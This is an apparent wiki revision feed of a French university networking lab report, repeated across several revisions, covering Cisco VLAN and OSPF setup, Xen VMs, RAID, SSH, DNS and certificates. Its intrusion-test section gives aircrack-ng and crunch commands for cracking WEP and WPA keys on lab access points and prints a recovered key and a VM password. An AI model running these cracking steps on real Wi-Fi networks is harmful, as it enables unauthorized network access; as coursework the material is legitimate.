&lt;br /&gt;
On vérifie que la configuration est cohérente à l'aide de &lt;br /&gt;
 named-checkzone anosteke59.site /etc/bind/db.anosteke59.site &lt;br /&gt;
&lt;br /&gt;
On vérifie ensuite que le DNS fonctionne avec NSLOOKUP (Installer dnsutils sur la vm)&lt;br /&gt;
 nslookup anosteke59.site &lt;br /&gt;
 dig anosteke59.site&lt;br /&gt;
&lt;br /&gt;
=== Sécurisation de site par certificat ===&lt;br /&gt;
On crée une demande de certificat avec la commande : &lt;br /&gt;
 openssl req -nodes -newkey rsa:2048 -sha256 -keyout anosteke59.key -out server.csr&lt;br /&gt;
&lt;br /&gt;
le fichier CSR doit alors être envoyé à gandi pour créer notre certificat. &lt;br /&gt;
Pour lancer la création de notre certificat on doit ajouter une entrée dans notre zone DNS. On attends ensuite le retour du certificat de gandi.&lt;br /&gt;
&lt;br /&gt;
=== Sécurisation de serveur DNS par DNSSEC ===&lt;br /&gt;
&lt;br /&gt;
== Réalisation ==&lt;br /&gt;
=== Sécurisation de données ===&lt;br /&gt;
Sur le serveur Xen, on créer nos volumes. &lt;br /&gt;
 lvcreate -L1G -nAnosteke-raid-1 storage&lt;br /&gt;
 lvcreate -L1G -nAnosteke-raid-2 storage&lt;br /&gt;
 lvcreate -L1G -nAnosteke-raid-3 storage&lt;br /&gt;
&lt;br /&gt;
Qu'on ajoute à la configuration de notre VM&lt;br /&gt;
 'phy:/dev/storage/Anosteke-raid-1,xvdb1,w',&lt;br /&gt;
 'phy:/dev/storage/Anosteke-raid-2,xvdb2,w',&lt;br /&gt;
 'phy:/dev/storage/Anosteke-raid-3,xvdb3,w'&lt;br /&gt;
&lt;br /&gt;
Après un rédémarrage de la VM on execute &lt;br /&gt;
&lt;br /&gt;
 mdadm --create /dev/md0 --level=5 --raid-devices=3 /dev/xvdb1 /dev/xvdb2 /dev/xvdb3&lt;br /&gt;
&lt;br /&gt;
=== Tests d’intrusion ===&lt;br /&gt;
&lt;br /&gt;
== WEP ==&lt;br /&gt;
On commence par casser la clé WEP.&lt;br /&gt;
&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
puis on lance &lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlan0mon 4&lt;br /&gt;
&lt;br /&gt;
3 représente la channel utilisée par l'ap (ici 3)&lt;br /&gt;
&lt;br /&gt;
Notre interface est renommée 'wlan0mon'.&lt;br /&gt;
Pour visualiser les paquets sniffés, on execute alors&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 4 wlan0mon&lt;br /&gt;
&lt;br /&gt;
On observe plusieurs emetteurs, avec leur BSSID associé. On choisit d'attaquer cracotte07 dont le BSSID est 04:DA:D2:9C:50:56 On lance alors la commande :&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -w dump -c 4 --bssid 04:DA:D2:9C:50:56 wlan0mon&lt;br /&gt;
&lt;br /&gt;
Après quelques minutes, on execute :&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng dump*.cap&lt;br /&gt;
&lt;br /&gt;
Si le programme a accumulé suffisamment de vecteurs d'initialisation (IVs), la clé WEP est cassée.&lt;br /&gt;
&lt;br /&gt;
== WPA ==&lt;br /&gt;
&lt;br /&gt;
On casse à présent la clé WPA. On scanne la bande de fréquence 9 :&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 9 wlan0mon&lt;br /&gt;
&lt;br /&gt;
On récupère le BSSID de kracotte07 : 44:AD:D9:5F:87:03 On récupère ensuite des handshakes avec la commande :&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 9 --bssid 44:AD:D9:5F:87:03 -w dumpWPA wlan0mon&lt;br /&gt;
&lt;br /&gt;
On utilise ensuite crunch pour générer la liste des mots de passe de 8 chiffres que l'on utilisera pour cracker la clé :&lt;br /&gt;
&lt;br /&gt;
 crunch 8 8 0123456789 -o password.lst&lt;br /&gt;
&lt;br /&gt;
Enfin, on lance la commande :&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng -w password.lst -b 44:AD:D9:5F:87:03 dumpWPA.cap&lt;br /&gt;
&lt;br /&gt;
Le processus peut prendre plusieurs heures. On obtient le mot de passe suivant : 59904999&lt;br /&gt;
&lt;br /&gt;
== Intrusion sur un serveur d’application Web ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Chiffrement de données ===&lt;br /&gt;
=== Inspection ARP par un élément réseau ===&lt;br /&gt;
===  Sécurisation WiFi par WPA2-EAP ===&lt;/div&gt;</summary>
		<author><name>Avercaem</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G7&amp;diff=57681</id>
		<title>TP sysres IMA5 2021/2022 G7</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G7&amp;diff=57681"/>
				<updated>2022-01-10T15:50:06Z</updated>
		
		<summary type="html">&lt;p&gt;Avercaem : /* Réalisation */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
= PRA 2021-2022 Arthur Vercaemst - Johnny Gouvaert =&lt;br /&gt;
&lt;br /&gt;
==Répartition travail==&lt;br /&gt;
&lt;br /&gt;
== Architecture réseau ==&lt;br /&gt;
&lt;br /&gt;
=== Configuration IPV4 ===&lt;br /&gt;
&lt;br /&gt;
==== Paramétrage des VLANs ====&lt;br /&gt;
&lt;br /&gt;
'''9200'''&lt;br /&gt;
Nous avons pris la tache de configurer le routeur cisco 9200 de la salle E-306&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, nous avons créé le VLAN 42. Ce VLAN permet l'accès au routeur 9200 depuis les VMs&lt;br /&gt;
Il est donc connecté au port TenGigabitethernet1/1/2 (10G) sur lequel est branchée un fibre venant du serveur capbreton.&lt;br /&gt;
&lt;br /&gt;
 enable&lt;br /&gt;
   conf t&lt;br /&gt;
     vlan 42&lt;br /&gt;
       exit&lt;br /&gt;
     int vlan 42&lt;br /&gt;
       no shut&lt;br /&gt;
       ip address 193.48.57.188  255.255.255.192&lt;br /&gt;
       ipv6 enable&lt;br /&gt;
       ipv6 address 2001:7A8:116E:60B0::F1/64 eui-64&lt;br /&gt;
       exit&lt;br /&gt;
     int TenGigabitethernet1/1/2&lt;br /&gt;
       no shut&lt;br /&gt;
       switchport mode access&lt;br /&gt;
       switchport access vlan 42&lt;br /&gt;
       exit&lt;br /&gt;
     exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
Ensuite, nous avons créé et configuré le VLAN 531. Ce vlan est relié par fibre au routeur de l'ecole pour l'accès internet&lt;br /&gt;
&lt;br /&gt;
 enable&lt;br /&gt;
  conf t&lt;br /&gt;
    vlan 531&lt;br /&gt;
      exit&lt;br /&gt;
    int vlan 531&lt;br /&gt;
      no shut&lt;br /&gt;
      ip address 192.168.222.42 255.255.255.248&lt;br /&gt;
      exit&lt;br /&gt;
    int TenGigabitethernet1/1/1&lt;br /&gt;
      no shut&lt;br /&gt;
      switchport mode access&lt;br /&gt;
      switchport access vlan 531&lt;br /&gt;
      exit&lt;br /&gt;
    exit&lt;br /&gt;
  write&lt;br /&gt;
&lt;br /&gt;
==== OPSF ====&lt;br /&gt;
OSPF (Open Shortest Path First) à chaque routeur de partager sa connaissance de la topologie du réseau, de cette manière on rends possible un routage plus dynamique sur notre infrastructure.&lt;br /&gt;
&lt;br /&gt;
 router ospf 1                                                                                                                                    &lt;br /&gt;
 router-id 10.00.0.1                                   &lt;br /&gt;
 log-adjacency-changes                                                                                  &lt;br /&gt;
 summary-address 193.48.57.176 255.255.255.240                                                                                                         &lt;br /&gt;
 summary-address 100.64.0.0 255.240.0.0 not-advertise  &lt;br /&gt;
 summary-address 10.0.0.0 255.0.0.0 not-advertise                                                                                                    &lt;br /&gt;
 redistribute connected subnets                       &lt;br /&gt;
 redistribute static subnets                                                                                                                         &lt;br /&gt;
 network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
&lt;br /&gt;
== Installation des systèmes d’exploitation ==&lt;br /&gt;
=== Installation dans la machine virtuelle Xen ===&lt;br /&gt;
&lt;br /&gt;
Après problème dû au l'utilisation de la commande su au lieux de su - nous avons créé notre image de notre VM&lt;br /&gt;
&lt;br /&gt;
 xen-create-image --hostname=Anosteke --ip=193.48.57.182 --gateway=193.48.57.188 --netmask=255.255.255.240 --dir=/usr/local/xen --password=pasglop --dist=bullseye&lt;br /&gt;
&lt;br /&gt;
Nous créons ensuite les 2 disques virtuels &lt;br /&gt;
&lt;br /&gt;
 lvcreate -L10G -n Anosteke1 storage&lt;br /&gt;
 lvcreate -L10G -n Anosteke2 storage&lt;br /&gt;
&lt;br /&gt;
Puis nous les formatons&lt;br /&gt;
&lt;br /&gt;
 mkfs.ext4 /dev/storage/Anosteke1&lt;br /&gt;
 mkfs.ext4 /dev/storage/Anosteke2&lt;br /&gt;
&lt;br /&gt;
Nous ajoutons les 2 disques au fichier de configuration de notre VM &lt;br /&gt;
&lt;br /&gt;
 nano /etc/xen/Anosteke.cfg&lt;br /&gt;
 disk        = [&lt;br /&gt;
                 'file:/usr/local/xen/domains/Bellerose/disk.img,xvda2,w',&lt;br /&gt;
                 'file:/usr/local/xen/domains/Bellerose/swap.img,xvda1,w',&lt;br /&gt;
                 'phy:/dev/storage/Anosteke1,xvda3,w',&lt;br /&gt;
                 'phy:/dev/storage/Anosteke2,xvda4,w'&lt;br /&gt;
              ]&lt;br /&gt;
 vif         = [ 'ip=193.48.57.182 ,mac=00:16:3E:AA:F5:2B ,bridge=IMA5sc' ]&lt;br /&gt;
&lt;br /&gt;
On peut ensuite démarrer notre VM&lt;br /&gt;
&lt;br /&gt;
 xl create -c /etc/xen/AnosTeke.cfg&lt;br /&gt;
&lt;br /&gt;
Pour enfin configurer nos espaces disque, en commençant par créer et monter nos espaces&lt;br /&gt;
&lt;br /&gt;
 mkdir /mnt/xvda3&lt;br /&gt;
 mkdir /mnt/xvda4&lt;br /&gt;
 mount /dev/xvda3 /mnt/xvda3&lt;br /&gt;
 mount /dev/xvda4 /mnt/xvda4&lt;br /&gt;
 mv /var/* /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Pour finaliser le montage des espaces, on modifie le fichier /etc/fstab pour y ajouter nos emplacements&lt;br /&gt;
&lt;br /&gt;
 /dev/xvda3 /home ext4 defaults 0 2&lt;br /&gt;
 /dev/xvda4 /var ext4 defaults 0 2&lt;br /&gt;
&lt;br /&gt;
On les configure DUMP disabled et Fsck 2.&lt;br /&gt;
On peut finalement lancer le MOUNT&lt;br /&gt;
&lt;br /&gt;
 mount -a&lt;br /&gt;
&lt;br /&gt;
et vérifier la bonne execution&lt;br /&gt;
 lsblk&lt;br /&gt;
 &lt;br /&gt;
 NAME  MAJ:MIN RM  SIZE RO TYPE MOUNTPOINT&lt;br /&gt;
 xvda1 202:1    0  512M  0 disk [SWAP]&lt;br /&gt;
 xvda2 202:2    0    4G  0 disk /&lt;br /&gt;
 xvda3 202:3    0   10G  0 disk /home&lt;br /&gt;
 xvda4 202:4    0   10G  0 disk /var&lt;br /&gt;
&lt;br /&gt;
sur le serveur nous pouvons vérifier que notre machine existe : &lt;br /&gt;
 xen-list-images | grep Name: %nom de la vm%&lt;br /&gt;
 lsblk | grep %nom de la vm%&lt;br /&gt;
et finalement pour lister les machines en fonctionnement&lt;br /&gt;
 xen list&lt;br /&gt;
&lt;br /&gt;
On peut ensuite se connecter à la machine&lt;br /&gt;
 xen console Anosteke&lt;br /&gt;
&lt;br /&gt;
On en profite pour ajouter un nouvel utilisateur&lt;br /&gt;
 sudo adduser pifou&lt;br /&gt;
&lt;br /&gt;
Et installer les paquets&lt;br /&gt;
 apt-get update&lt;br /&gt;
 apt-get upgrade&lt;br /&gt;
&lt;br /&gt;
== Services Internet ==&lt;br /&gt;
=== Serveur SSH ===&lt;br /&gt;
On vérifie que OpenSSH est installé &lt;br /&gt;
 ssh -V&lt;br /&gt;
&lt;br /&gt;
Si il ne l'est pas on l'install. &lt;br /&gt;
 sudo apt install openssh-server&lt;br /&gt;
&lt;br /&gt;
Pour lancer et arreter le service SSH : &lt;br /&gt;
 sudo service ssh stop&lt;br /&gt;
 sudo service ssh start&lt;br /&gt;
&lt;br /&gt;
Pour desactiver le service : &lt;br /&gt;
 sudo systemctl disable ssh&lt;br /&gt;
&lt;br /&gt;
Pour connaitre l'état du service : &lt;br /&gt;
 sudo systemctl status ssh&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite configurer ssh dans le fichier etc/ssh/sshd_config&lt;br /&gt;
 /etc/ssh&lt;br /&gt;
 ├── ssh_config&lt;br /&gt;
 ├── sshd_config&lt;br /&gt;
 ├── ssh_host_rsa_key&lt;br /&gt;
 └── ssh_host_rsa_key.pub&lt;br /&gt;
&lt;br /&gt;
Dans ce fichier on modifie les paramètres suivants : &lt;br /&gt;
 Port 22&lt;br /&gt;
 LogLevel VERBOSE&lt;br /&gt;
 PermitRootLogin no&lt;br /&gt;
 Banner /etc/ssh/banner&lt;br /&gt;
&lt;br /&gt;
On redemarre ensuite le service SSH&lt;br /&gt;
 systemctl reaload ssh.service&lt;br /&gt;
&lt;br /&gt;
=== Serveur DNS ===&lt;br /&gt;
On associe notre IP au nom de domaine depuis l'interface du fournisseur Gandi.Net&lt;br /&gt;
&lt;br /&gt;
On install :&lt;br /&gt;
 apt-get install bind9&lt;br /&gt;
On peut aussi installer le paquet dsnutils pour débugger le service DNS &lt;br /&gt;
&lt;br /&gt;
Configuration du fichier /etc/bind/named.conf.options&lt;br /&gt;
 listen-on {any;};&lt;br /&gt;
 //allow-recursion  {localhost;};&lt;br /&gt;
&lt;br /&gt;
On configure ensuite le bind de notre nom de domaine.&lt;br /&gt;
 /etc/bind/db.anosteke59.site                        &lt;br /&gt;
 $TTL 1H&lt;br /&gt;
 @       IN      SOA     ns.anosteke59.site (&lt;br /&gt;
                         12      ; serial number YYMMDDNN&lt;br /&gt;
                         1H           ; Refresh&lt;br /&gt;
                         1H            ; Retry&lt;br /&gt;
                         1D          ; Expire&lt;br /&gt;
                         1H           ; Min TTL&lt;br /&gt;
                         )&lt;br /&gt;
          IN      NS      ns.anosteke59.site.&lt;br /&gt;
          IN      NS      ns6.gandi.net. &lt;br /&gt;
 www      IN      A       193.48.57.182&lt;br /&gt;
 ns       IN      CNAME   WWW&lt;br /&gt;
&lt;br /&gt;
On vérifie que la configuration est cohérente à l'aide de &lt;br /&gt;
 named-checkzone anosteke59.site /etc/bind/db.anosteke59.site &lt;br /&gt;
&lt;br /&gt;
On vérifie ensuite que le DNS fonctionne avec NSLOOKUP (Installer dnsutils sur la vm)&lt;br /&gt;
 nslookup anosteke59.site &lt;br /&gt;
 dig anosteke59.site&lt;br /&gt;
&lt;br /&gt;
=== Sécurisation de site par certificat ===&lt;br /&gt;
On crée une demande de certificat avec la commande : &lt;br /&gt;
 openssl req -nodes -newkey rsa:2048 -sha256 -keyout anosteke59.key -out server.csr&lt;br /&gt;
&lt;br /&gt;
le fichier CSR doit alors être envoyé à gandi pour créer notre certificat. &lt;br /&gt;
Pour lancer la création de notre certificat on doit ajouter une entrée dans notre zone DNS. On attends ensuite le retour du certificat de gandi.&lt;br /&gt;
&lt;br /&gt;
=== Sécurisation de serveur DNS par DNSSEC ===&lt;br /&gt;
&lt;br /&gt;
== Réalisation ==&lt;br /&gt;
=== Sécurisation de données ===&lt;br /&gt;
Sur le serveur Xen, on créer nos volumes. &lt;br /&gt;
 lvcreate -L1G -nAnosteke-raid-1 storage&lt;br /&gt;
 lvcreate -L1G -nAnosteke-raid-2 storage&lt;br /&gt;
 lvcreate -L1G -nAnosteke-raid-3 storage&lt;br /&gt;
&lt;br /&gt;
Qu'on ajoute à la configuration de notre VM&lt;br /&gt;
 'phy:/dev/storage/Anosteke-raid-1,xvdb1,w',&lt;br /&gt;
 'phy:/dev/storage/Anosteke-raid-2,xvdb2,w',&lt;br /&gt;
 'phy:/dev/storage/Anosteke-raid-3,xvdb3,w'&lt;br /&gt;
&lt;br /&gt;
Après un rédémarrage de la VM on execute &lt;br /&gt;
&lt;br /&gt;
mdadm --create /dev/md0 --level=5 --raid-devices=3 /dev/xvdb1 /dev/xvdb2 /dev/xvdb3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Tests d’intrusion ===&lt;br /&gt;
&lt;br /&gt;
== WEP ==&lt;br /&gt;
On commence par casser la clé WEP.&lt;br /&gt;
&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
puis on lance &lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlan0mon 4&lt;br /&gt;
&lt;br /&gt;
3 représente la channel utilisée par l'ap (ici 3)&lt;br /&gt;
&lt;br /&gt;
Notre interface est renommée 'wlan0mon'.&lt;br /&gt;
Pour visualiser les paquets sniffés, on execute alors&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 4 wlan0mon&lt;br /&gt;
&lt;br /&gt;
On observe plusieurs emetteurs, avec leur BSSID associé. On choisit d'attaquer cracotte07 dont le BSSID est 04:DA:D2:9C:50:56 On lance alors la commande :&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -w dump -c 4 --bssid 04:DA:D2:9C:50:56 wlan0mon&lt;br /&gt;
&lt;br /&gt;
Après quelques minutes, on execute :&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng dump*.cap&lt;br /&gt;
&lt;br /&gt;
Si le programme a accumulé suffisamment de vecteurs d'initialisation (IVs), la clé WEP est cassée.&lt;br /&gt;
&lt;br /&gt;
== WPA ==&lt;br /&gt;
&lt;br /&gt;
On casse à présent la clé WPA. On scanne la bande de fréquence 9 :&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 9 wlan0mon&lt;br /&gt;
&lt;br /&gt;
On récupère le BSSID de kracotte07 : 44:AD:D9:5F:87:03 On récupère ensuite des handshakes avec la commande :&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 9 --bssid 44:AD:D9:5F:87:03 -w dumpWPA wlan0mon&lt;br /&gt;
&lt;br /&gt;
On utilise ensuite crunch pour générer la liste des mots de passe de 8 chiffres que l'on utilisera pour cracker la clé :&lt;br /&gt;
&lt;br /&gt;
 crunch 8 8 0123456789 -o password.lst&lt;br /&gt;
&lt;br /&gt;
Enfin, on lance la commande :&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng -w password.lst -b 44:AD:D9:5F:87:03 dumpWPA.cap&lt;br /&gt;
&lt;br /&gt;
Le processus peut prendre plusieurs heures. On obtient le mot de passe suivant : 59904999&lt;br /&gt;
&lt;br /&gt;
== Intrusion sur un serveur d’application Web ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Chiffrement de données ===&lt;br /&gt;
=== Inspection ARP par un élément réseau ===&lt;br /&gt;
===  Sécurisation WiFi par WPA2-EAP ===&lt;/div&gt;</summary>
		<author><name>Avercaem</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G7&amp;diff=57665</id>
		<title>TP sysres IMA5 2021/2022 G7</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G7&amp;diff=57665"/>
				<updated>2022-01-10T15:28:03Z</updated>
		
		<summary type="html">&lt;p&gt;Avercaem : /* WEP */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
= PRA 2021-2022 Arthur Vercaemst - Johnny Gouvaert =&lt;br /&gt;
&lt;br /&gt;
==Répartition travail==&lt;br /&gt;
&lt;br /&gt;
== Architecture réseau ==&lt;br /&gt;
&lt;br /&gt;
=== Configuration IPV4 ===&lt;br /&gt;
&lt;br /&gt;
==== Paramétrage des VLANs ====&lt;br /&gt;
&lt;br /&gt;
'''9200'''&lt;br /&gt;
Nous avons pris la tache de configurer le routeur cisco 9200 de la salle E-306&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, nous avons créé le VLAN 42. Ce VLAN permet l'accès au routeur 9200 depuis les VMs&lt;br /&gt;
Il est donc connecté au port TenGigabitethernet1/1/2 (10G) sur lequel est branchée un fibre venant du serveur capbreton.&lt;br /&gt;
&lt;br /&gt;
 enable&lt;br /&gt;
   conf t&lt;br /&gt;
     vlan 42&lt;br /&gt;
       exit&lt;br /&gt;
     int vlan 42&lt;br /&gt;
       no shut&lt;br /&gt;
       ip address 193.48.57.188  255.255.255.192&lt;br /&gt;
       ipv6 enable&lt;br /&gt;
       ipv6 address 2001:7A8:116E:60B0::F1/64 eui-64&lt;br /&gt;
       exit&lt;br /&gt;
     int TenGigabitethernet1/1/2&lt;br /&gt;
       no shut&lt;br /&gt;
       switchport mode access&lt;br /&gt;
       switchport access vlan 42&lt;br /&gt;
       exit&lt;br /&gt;
     exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
Ensuite, nous avons créé et configuré le VLAN 531. Ce vlan est relié par fibre au routeur de l'ecole pour l'accès internet&lt;br /&gt;
&lt;br /&gt;
 enable&lt;br /&gt;
  conf t&lt;br /&gt;
    vlan 531&lt;br /&gt;
      exit&lt;br /&gt;
    int vlan 531&lt;br /&gt;
      no shut&lt;br /&gt;
      ip address 192.168.222.42 255.255.255.248&lt;br /&gt;
      exit&lt;br /&gt;
    int TenGigabitethernet1/1/1&lt;br /&gt;
      no shut&lt;br /&gt;
      switchport mode access&lt;br /&gt;
      switchport access vlan 531&lt;br /&gt;
      exit&lt;br /&gt;
    exit&lt;br /&gt;
  write&lt;br /&gt;
&lt;br /&gt;
==== OPSF ====&lt;br /&gt;
OSPF (Open Shortest Path First) à chaque routeur de partager sa connaissance de la topologie du réseau, de cette manière on rends possible un routage plus dynamique sur notre infrastructure.&lt;br /&gt;
&lt;br /&gt;
 router ospf 1                                                                                                                                    &lt;br /&gt;
 router-id 10.00.0.1                                   &lt;br /&gt;
 log-adjacency-changes                                                                                  &lt;br /&gt;
 summary-address 193.48.57.176 255.255.255.240                                                                                                         &lt;br /&gt;
 summary-address 100.64.0.0 255.240.0.0 not-advertise  &lt;br /&gt;
 summary-address 10.0.0.0 255.0.0.0 not-advertise                                                                                                    &lt;br /&gt;
 redistribute connected subnets                       &lt;br /&gt;
 redistribute static subnets                                                                                                                         &lt;br /&gt;
 network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
&lt;br /&gt;
== Installation des systèmes d’exploitation ==&lt;br /&gt;
=== Installation dans la machine virtuelle Xen ===&lt;br /&gt;
&lt;br /&gt;
Après problème dû au l'utilisation de la commande su au lieux de su - nous avons créé notre image de notre VM&lt;br /&gt;
&lt;br /&gt;
 xen-create-image --hostname=Anosteke --ip=193.48.57.182 --gateway=193.48.57.188 --netmask=255.255.255.240 --dir=/usr/local/xen --password=pasglop --dist=bullseye&lt;br /&gt;
&lt;br /&gt;
Nous créons ensuite les 2 disques virtuels &lt;br /&gt;
&lt;br /&gt;
 lvcreate -L10G -n Anosteke1 storage&lt;br /&gt;
 lvcreate -L10G -n Anosteke2 storage&lt;br /&gt;
&lt;br /&gt;
Puis nous les formatons&lt;br /&gt;
&lt;br /&gt;
 mkfs.ext4 /dev/storage/Anosteke1&lt;br /&gt;
 mkfs.ext4 /dev/storage/Anosteke2&lt;br /&gt;
&lt;br /&gt;
Nous ajoutons les 2 disques au fichier de configuration de notre VM &lt;br /&gt;
&lt;br /&gt;
 nano /etc/xen/Anosteke.cfg&lt;br /&gt;
 disk        = [&lt;br /&gt;
                 'file:/usr/local/xen/domains/Bellerose/disk.img,xvda2,w',&lt;br /&gt;
                 'file:/usr/local/xen/domains/Bellerose/swap.img,xvda1,w',&lt;br /&gt;
                 'phy:/dev/storage/Anosteke1,xvda3,w',&lt;br /&gt;
                 'phy:/dev/storage/Anosteke2,xvda4,w'&lt;br /&gt;
              ]&lt;br /&gt;
 vif         = [ 'ip=193.48.57.182 ,mac=00:16:3E:AA:F5:2B ,bridge=IMA5sc' ]&lt;br /&gt;
&lt;br /&gt;
On peut ensuite démarrer notre VM&lt;br /&gt;
&lt;br /&gt;
 xl create -c /etc/xen/AnosTeke.cfg&lt;br /&gt;
&lt;br /&gt;
Pour enfin configurer nos espaces disque, en commençant par créer et monter nos espaces&lt;br /&gt;
&lt;br /&gt;
 mkdir /mnt/xvda3&lt;br /&gt;
 mkdir /mnt/xvda4&lt;br /&gt;
 mount /dev/xvda3 /mnt/xvda3&lt;br /&gt;
 mount /dev/xvda4 /mnt/xvda4&lt;br /&gt;
 mv /var/* /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Pour finaliser le montage des espaces, on modifie le fichier /etc/fstab pour y ajouter nos emplacements&lt;br /&gt;
&lt;br /&gt;
 /dev/xvda3 /home ext4 defaults 0 2&lt;br /&gt;
 /dev/xvda4 /var ext4 defaults 0 2&lt;br /&gt;
&lt;br /&gt;
On les configure DUMP disabled et Fsck 2.&lt;br /&gt;
On peut finalement lancer le MOUNT&lt;br /&gt;
&lt;br /&gt;
 mount -a&lt;br /&gt;
&lt;br /&gt;
et vérifier la bonne execution&lt;br /&gt;
 lsblk&lt;br /&gt;
 &lt;br /&gt;
 NAME  MAJ:MIN RM  SIZE RO TYPE MOUNTPOINT&lt;br /&gt;
 xvda1 202:1    0  512M  0 disk [SWAP]&lt;br /&gt;
 xvda2 202:2    0    4G  0 disk /&lt;br /&gt;
 xvda3 202:3    0   10G  0 disk /home&lt;br /&gt;
 xvda4 202:4    0   10G  0 disk /var&lt;br /&gt;
&lt;br /&gt;
sur le serveur nous pouvons vérifier que notre machine existe : &lt;br /&gt;
 xen-list-images | grep Name: %nom de la vm%&lt;br /&gt;
 lsblk | grep %nom de la vm%&lt;br /&gt;
et finalement pour lister les machines en fonctionnement&lt;br /&gt;
 xen list&lt;br /&gt;
&lt;br /&gt;
On peut ensuite se connecter à la machine&lt;br /&gt;
 xen console Anosteke&lt;br /&gt;
&lt;br /&gt;
On en profite pour ajouter un nouvel utilisateur&lt;br /&gt;
 sudo adduser pifou&lt;br /&gt;
&lt;br /&gt;
Et installer les paquets&lt;br /&gt;
 apt-get update&lt;br /&gt;
 apt-get upgrade&lt;br /&gt;
&lt;br /&gt;
== Services Internet ==&lt;br /&gt;
=== Serveur SSH ===&lt;br /&gt;
On vérifie que OpenSSH est installé &lt;br /&gt;
 ssh -V&lt;br /&gt;
&lt;br /&gt;
Si il ne l'est pas on l'install. &lt;br /&gt;
 sudo apt install openssh-server&lt;br /&gt;
&lt;br /&gt;
Pour lancer et arreter le service SSH : &lt;br /&gt;
 sudo service ssh stop&lt;br /&gt;
 sudo service ssh start&lt;br /&gt;
&lt;br /&gt;
Pour desactiver le service : &lt;br /&gt;
 sudo systemctl disable ssh&lt;br /&gt;
&lt;br /&gt;
Pour connaitre l'état du service : &lt;br /&gt;
 sudo systemctl status ssh&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite configurer ssh dans le fichier etc/ssh/sshd_config&lt;br /&gt;
 /etc/ssh&lt;br /&gt;
 ├── ssh_config&lt;br /&gt;
 ├── sshd_config&lt;br /&gt;
 ├── ssh_host_rsa_key&lt;br /&gt;
 └── ssh_host_rsa_key.pub&lt;br /&gt;
&lt;br /&gt;
Dans ce fichier on modifie les paramètres suivants : &lt;br /&gt;
 Port 22&lt;br /&gt;
 LogLevel VERBOSE&lt;br /&gt;
 PermitRootLogin no&lt;br /&gt;
 Banner /etc/ssh/banner&lt;br /&gt;
&lt;br /&gt;
On redemarre ensuite le service SSH&lt;br /&gt;
 systemctl reaload ssh.service&lt;br /&gt;
&lt;br /&gt;
=== Serveur DNS ===&lt;br /&gt;
On associe notre IP au nom de domaine depuis l'interface du fournisseur Gandi.Net&lt;br /&gt;
&lt;br /&gt;
On install :&lt;br /&gt;
 apt-get install bind9&lt;br /&gt;
On peut aussi installer le paquet dsnutils pour débugger le service DNS &lt;br /&gt;
&lt;br /&gt;
Configuration du fichier /etc/bind/named.conf.options&lt;br /&gt;
 listen-on {any;};&lt;br /&gt;
 //allow-recursion  {localhost;};&lt;br /&gt;
&lt;br /&gt;
On configure ensuite le bind de notre nom de domaine.&lt;br /&gt;
 /etc/bind/db.anosteke59.site                        &lt;br /&gt;
 $TTL 1H&lt;br /&gt;
 @       IN      SOA     ns.anosteke59.site (&lt;br /&gt;
                         12      ; serial number YYMMDDNN&lt;br /&gt;
                         1H           ; Refresh&lt;br /&gt;
                         1H            ; Retry&lt;br /&gt;
                         1D          ; Expire&lt;br /&gt;
                         1H           ; Min TTL&lt;br /&gt;
                         )&lt;br /&gt;
          IN      NS      ns.anosteke59.site.&lt;br /&gt;
          IN      NS      ns6.gandi.net. &lt;br /&gt;
 www      IN      A       193.48.57.182&lt;br /&gt;
 ns       IN      CNAME   WWW&lt;br /&gt;
&lt;br /&gt;
On vérifie que la configuration est cohérente à l'aide de &lt;br /&gt;
 named-checkzone anosteke59.site /etc/bind/db.anosteke59.site &lt;br /&gt;
&lt;br /&gt;
On vérifie ensuite que le DNS fonctionne avec NSLOOKUP (Installer dnsutils sur la vm)&lt;br /&gt;
 nslookup anosteke59.site &lt;br /&gt;
 dig anosteke59.site&lt;br /&gt;
&lt;br /&gt;
=== Sécurisation de site par certificat ===&lt;br /&gt;
On crée une demande de certificat avec la commande : &lt;br /&gt;
 openssl req -nodes -newkey rsa:2048 -sha256 -keyout anosteke59.key -out server.csr&lt;br /&gt;
&lt;br /&gt;
le fichier CSR doit alors être envoyé à gandi pour créer notre certificat. &lt;br /&gt;
